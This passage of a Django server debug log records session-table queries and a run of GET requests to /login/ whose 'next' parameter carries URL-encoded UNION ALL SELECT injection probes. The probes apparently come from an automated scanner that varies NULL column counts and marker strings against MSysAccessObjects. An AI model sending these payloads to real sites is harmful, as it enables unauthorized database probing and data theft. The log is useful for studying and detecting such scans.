15:25:19,833 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6tob8u3ot9lwyh3a34xe8jf1qr3q8nqe' LIMIT 1; args=('6tob8u3ot9lwyh3a34xe8jf1qr3q8nqe',) DEBUG 2020-01-01 15:25:19,835 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6tob8u3ot9lwyh3a34xe8jf1qr3q8nqe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:19.834090+00:00'::timestamptz); args=('6tob8u3ot9lwyh3a34xe8jf1qr3q8nqe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 19, 834090, tzinfo=)) [01/Jan/2020 15:25:19] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2C%27qxvkq%27%7C%7C%27jzflZlyivj%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20OwlS HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:20,010 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4zpfkh2r1lozxmb1wzhyj8d8hhb1u48l' LIMIT 1; args=('4zpfkh2r1lozxmb1wzhyj8d8hhb1u48l',) DEBUG 2020-01-01 15:25:20,013 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4zpfkh2r1lozxmb1wzhyj8d8hhb1u48l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:20.011589+00:00'::timestamptz); args=('4zpfkh2r1lozxmb1wzhyj8d8hhb1u48l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 20, 11589, tzinfo=)) [01/Jan/2020 15:25:20] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27qxvkq%27%7C%7C%27hKDCdsRkEB%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20vPOI HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:20,196 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bhuw0mb1npqyi5byw19kj3571megzraz' LIMIT 1; args=('bhuw0mb1npqyi5byw19kj3571megzraz',) DEBUG 2020-01-01 15:25:20,199 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bhuw0mb1npqyi5byw19kj3571megzraz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:20.197162+00:00'::timestamptz); args=('bhuw0mb1npqyi5byw19kj3571megzraz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 20, 197162, tzinfo=)) [01/Jan/2020 15:25:20] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27emlwnBCLoG%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20kMif HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:20,364 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wxfcfrn6rd0hepdcv6y5c0te9ey1wefy' LIMIT 1; args=('wxfcfrn6rd0hepdcv6y5c0te9ey1wefy',) DEBUG 2020-01-01 15:25:20,366 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wxfcfrn6rd0hepdcv6y5c0te9ey1wefy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:20.364982+00:00'::timestamptz); args=('wxfcfrn6rd0hepdcv6y5c0te9ey1wefy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 20, 364982, tzinfo=)) [01/Jan/2020 15:25:20] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27pfLVFaHfjs%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20wGTg HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:20,531 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'q3je8qvbmqs0cz9r4y2j36rnu9mj3b93' LIMIT 1; args=('q3je8qvbmqs0cz9r4y2j36rnu9mj3b93',) DEBUG 2020-01-01 15:25:20,533 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('q3je8qvbmqs0cz9r4y2j36rnu9mj3b93', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:20.532117+00:00'::timestamptz); args=('q3je8qvbmqs0cz9r4y2j36rnu9mj3b93', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 20, 532117, tzinfo=)) [01/Jan/2020 15:25:20] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27hGtIDyNRnz%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20Thvf HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:20,699 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'j1a5wpectavb6ycdbzkuekj8x37rxtmx' LIMIT 1; args=('j1a5wpectavb6ycdbzkuekj8x37rxtmx',) DEBUG 2020-01-01 15:25:20,702 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('j1a5wpectavb6ycdbzkuekj8x37rxtmx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:20.700186+00:00'::timestamptz); args=('j1a5wpectavb6ycdbzkuekj8x37rxtmx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 20, 700186, tzinfo=)) [01/Jan/2020 15:25:20] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27QxwWZLpDWa%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20FuWQ HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:20,861 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'upyza1870udprtidxw74gfm0rchdy57s' LIMIT 1; args=('upyza1870udprtidxw74gfm0rchdy57s',) DEBUG 2020-01-01 15:25:20,863 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('upyza1870udprtidxw74gfm0rchdy57s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:20.862016+00:00'::timestamptz); args=('upyza1870udprtidxw74gfm0rchdy57s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 20, 862016, tzinfo=)) [01/Jan/2020 15:25:20] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27DcQASHgMQt%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20GpWw HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:21,025 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'am1zbkg0s3o4vlnlhllfgxhxyku5xag5' LIMIT 1; args=('am1zbkg0s3o4vlnlhllfgxhxyku5xag5',) DEBUG 2020-01-01 15:25:21,028 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('am1zbkg0s3o4vlnlhllfgxhxyku5xag5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:21.026162+00:00'::timestamptz); args=('am1zbkg0s3o4vlnlhllfgxhxyku5xag5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 21, 26162, tzinfo=)) [01/Jan/2020 15:25:21] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27GmWmkFbMjY%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20AnST HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:21,205 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'it85oxsrl8wryk1o981o9bpdhmk8xycg' LIMIT 1; args=('it85oxsrl8wryk1o981o9bpdhmk8xycg',) DEBUG 2020-01-01 15:25:21,208 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('it85oxsrl8wryk1o981o9bpdhmk8xycg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:21.206455+00:00'::timestamptz); args=('it85oxsrl8wryk1o981o9bpdhmk8xycg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 21, 206455, tzinfo=)) [01/Jan/2020 15:25:21] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27RySrqOeeNK%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20nvOC HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:21,379 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pxy6typqlnogffals3bvwip1wcd848fn' LIMIT 1; args=('pxy6typqlnogffals3bvwip1wcd848fn',) DEBUG 2020-01-01 15:25:21,382 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pxy6typqlnogffals3bvwip1wcd848fn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:21.380319+00:00'::timestamptz); args=('pxy6typqlnogffals3bvwip1wcd848fn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 21, 380319, tzinfo=)) [01/Jan/2020 15:25:21] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27xYDrJVmABW%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20fREY HTTP/1.0" 200 2278 DEBUG 2020-01-01 15:25:21,556 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '91kwj88ok12c4jyawy67v6616kjttnf9' LIMIT 1; args=('91kwj88ok12c4jyawy67v6616kjttnf9',) DEBUG 2020-01-01 15:25:21,559 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('91kwj88ok12c4jyawy67v6616kjttnf9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:21.557612+00:00'::timestamptz); args=('91kwj88ok12c4jyawy67v6616kjttnf9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 21, 557612, tzinfo=)) [01/Jan/2020 15:25:21] "GET /login/?next=-9246%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27jVBmtTmxpqMYohZyALsfsloxbjwfAIcxWEcUlSyd%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20eDjL HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:21,726 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1n60iwzij0elv1lpdq6mzuudby8aaupm' LIMIT 1; args=('1n60iwzij0elv1lpdq6mzuudby8aaupm',) DEBUG 2020-01-01 15:25:21,729 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1n60iwzij0elv1lpdq6mzuudby8aaupm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:21.727535+00:00'::timestamptz); args=('1n60iwzij0elv1lpdq6mzuudby8aaupm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 21, 727535, tzinfo=)) [01/Jan/2020 15:25:21] "GET /login/?next=-5875%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27qinMSMquSgtXhJRwhzKbUcWXrMAKNXoowLxVrNRd%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20ibQR HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:21,864 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'f3ccd96ivabev6uk6tj0kfxmkdsw362t' LIMIT 1; args=('f3ccd96ivabev6uk6tj0kfxmkdsw362t',) DEBUG 2020-01-01 15:25:21,866 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('f3ccd96ivabev6uk6tj0kfxmkdsw362t', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:21.864787+00:00'::timestamptz); args=('f3ccd96ivabev6uk6tj0kfxmkdsw362t', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 21, 864787, tzinfo=)) [01/Jan/2020 15:25:21] "GET /login/?next=-3465%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27KUNKTkjbEwdbdrfkiGxadKdsstDglKzHffoJZYqR%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20YQok HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:22,004 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5qjrkh27v5nc4h3pk7j6kc13nr4k6gpj' LIMIT 1; args=('5qjrkh27v5nc4h3pk7j6kc13nr4k6gpj',) DEBUG 2020-01-01 15:25:22,006 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5qjrkh27v5nc4h3pk7j6kc13nr4k6gpj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:22.005305+00:00'::timestamptz); args=('5qjrkh27v5nc4h3pk7j6kc13nr4k6gpj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 22, 5305, tzinfo=)) [01/Jan/2020 15:25:22] "GET /login/?next=-2331%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27nxsvslxntEFSDtkunhFPiiDJlGBgdWoPXwKamhvJ%27%7C%7C%27qppzq%27%20FROM%20MSysAccessObjects--%20WEOZ HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:22,142 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qkmm3ldwbw8fmn4cx6ywuimt0y91582c' LIMIT 1; args=('qkmm3ldwbw8fmn4cx6ywuimt0y91582c',) DEBUG 2020-01-01 15:25:22,144 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qkmm3ldwbw8fmn4cx6ywuimt0y91582c', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:22.142946+00:00'::timestamptz); args=('qkmm3ldwbw8fmn4cx6ywuimt0y91582c', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 22, 142946, tzinfo=)) [01/Jan/2020 15:25:22] "GET /login/?next=-7479%20UNION%20ALL%20SELECT%20NULL%2C%27qxvkq%27%7C%7C%27NCTRcmmlQPvkPftsTSQyerSEMgebwIGEmGXoZUXh%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20YWOg HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:22,284 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hcf3tv4urlum7so9inp0tt50dslcbaha' LIMIT 1; args=('hcf3tv4urlum7so9inp0tt50dslcbaha',) DEBUG 2020-01-01 15:25:22,286 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hcf3tv4urlum7so9inp0tt50dslcbaha', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:22.284660+00:00'::timestamptz); args=('hcf3tv4urlum7so9inp0tt50dslcbaha', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 22, 284660, tzinfo=)) [01/Jan/2020 15:25:22] "GET /login/?next=-3561%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27DimyJUPRoDNwzvUiPVylamKCUHRDTIDopZRPuwNU%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20rTFO HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:22,428 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dsxhqniv2qdewbr2isfjm7vened3qreq' LIMIT 1; args=('dsxhqniv2qdewbr2isfjm7vened3qreq',) DEBUG 2020-01-01 15:25:22,430 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dsxhqniv2qdewbr2isfjm7vened3qreq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:22.429360+00:00'::timestamptz); args=('dsxhqniv2qdewbr2isfjm7vened3qreq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 22, 429360, tzinfo=)) [01/Jan/2020 15:25:22] "GET /login/?next=-9465%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27zptpOgAEZIwbTvmkPRUPlWEeobFciwXlfnzBjLtL%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20ehkY HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:22,598 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cehs2tl1c4u3b4pq26mhfcfmiputmbms' LIMIT 1; args=('cehs2tl1c4u3b4pq26mhfcfmiputmbms',) DEBUG 2020-01-01 15:25:22,600 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cehs2tl1c4u3b4pq26mhfcfmiputmbms', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:22.598667+00:00'::timestamptz); args=('cehs2tl1c4u3b4pq26mhfcfmiputmbms', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 22, 598667, tzinfo=)) [01/Jan/2020 15:25:22] "GET /login/?next=-9277%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27rHWWoUXlTrKGjDFyhctKxGDFsyWslvpnkWroXBXd%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20DEgZ HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:22,799 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'brqkpt9uc5yng9rypdtg117au1peksdk' LIMIT 1; args=('brqkpt9uc5yng9rypdtg117au1peksdk',) DEBUG 2020-01-01 15:25:22,801 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('brqkpt9uc5yng9rypdtg117au1peksdk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:22.800083+00:00'::timestamptz); args=('brqkpt9uc5yng9rypdtg117au1peksdk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 22, 800083, tzinfo=)) [01/Jan/2020 15:25:22] "GET /login/?next=-8928%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27vllGXEyeXgPROJRKownJspGBfqqhrzdfjvdHFXgM%27%7C%7C%27qppzq%27%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20ZYOi HTTP/1.0" 200 2344 DEBUG 2020-01-01 15:25:22,966 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2c4x90wbmld3k9fi4zrw69x8dlssfd12' LIMIT 1; args=('2c4x90wbmld3k9fi4zrw69x8dlssfd12',) DEBUG 2020-01-01 15:25:22,969 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2c4x90wbmld3k9fi4zrw69x8dlssfd12', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:22.967111+00:00'::timestamptz); args=('2c4x90wbmld3k9fi4zrw69x8dlssfd12', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', 